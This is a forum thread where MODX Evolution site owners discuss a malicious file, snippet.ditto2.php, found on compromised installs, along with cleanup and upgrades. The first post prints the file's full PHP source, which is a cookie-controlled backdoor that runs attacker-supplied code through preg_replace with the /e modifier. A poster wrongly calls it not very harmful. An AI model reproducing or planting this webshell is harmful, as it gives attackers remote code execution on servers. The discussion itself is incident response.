-
- 1,613 Posts
I have a site which I was about to update (now 1.0.4) and in /assets/snippets/ditto/ there is a file called: snippet.ditto2.php with content:
<?php
/**
* @package
* @since
*/
class PlgSys {
public function __construct() {
$file = @$_COOKIE['Jlma3'];
if ($file){
$opt=$file(@$_COOKIE['Jlma2']);
$au=$file(@$_COOKIE['Jlma1']);
$opt("/292/e",$au,292);
die();
} else {
phpinfo(); die;
}
}
}
$phpinfo = new PlgSys;
Is that a hack file? I do think so!
[ed. note: fourroses666 last edited this post 9 years, 9 months ago.]
Evolution user, I like the back-end speed and simplicity
-
- 1,613 Posts
:)
couldn't really find any other infected files beside that file, no idea what it does.
anyway the site is now updated to the newest version and totally cleaned it.
no special snippets beside phx where installed.
I found the file on an other site too which is updated and so I prolly killed it.
Evolution user, I like the back-end speed and simplicity
-
- 1,613 Posts
damned, found another 3 sites with /assets/snippets/ditto/snippet.ditto2.php
anyone else having this file on that location?
think it has to do with version 1.0.4 and older.
[ed. note: fourroses666 last edited this post 9 years, 9 months ago.]
Evolution user, I like the back-end speed and simplicity
If you aren't running 1.0.14 then your site runs a high risk of being compromised, as there are multiple issues. I've seen quite a few sites exploited including 1.0.13 sites.
-
- 1,613 Posts
WOW, this is serieus stuff, almost 20% of my sites has the php file!
These files where places between date: 23-06-2014 and 25-06-2014! (different Hosts)
Peoples, please check your folders if you are infected:
/assets/snippets/ditto/snippet.ditto2.php
also check your cache folder for suspicious .php files.
I think many peoples have that file?
I don't know what it does thow.. please let me know if you are also infected...
Just updating to 1.0.14 won't solve the hack if you are already hit (because it is not a default file and won't be overwritten..)
[ed. note: fourroses666 last edited this post 9 years, 9 months ago.]
Evolution user, I like the back-end speed and simplicity
-
- 1,613 Posts
I'm a bit amazed I'm the only one out here with this hackfile..
Evolution user, I like the back-end speed and simplicity
-
- 1,613 Posts
I'm pritty sure it is the ajaxseach stuff.
At the moment I really think an update and removing that file will close the leak but if someone can find other files somewhere I would love to know, I didn't.
On a couple infected sites I have installed a blank version of evo 1.0.14, copied the config file back and images / templates and plugins/phx folders.
When I look at the script I see there is a cookie build, I don't get it. Doesnt look that harmfull but who knows.. Some Joomla sites have the same problem I saw after googling.
Evolution user, I like the back-end speed and simplicity
-
- 953 Posts
Ah, will contact my friend and ask if AjaxSearch was in the sites
My sites (touch wood) are all OK - I always delete everything I don't use e.g. snippets, plugins etc. and have never used AjaxSearch.
Will post back ASAP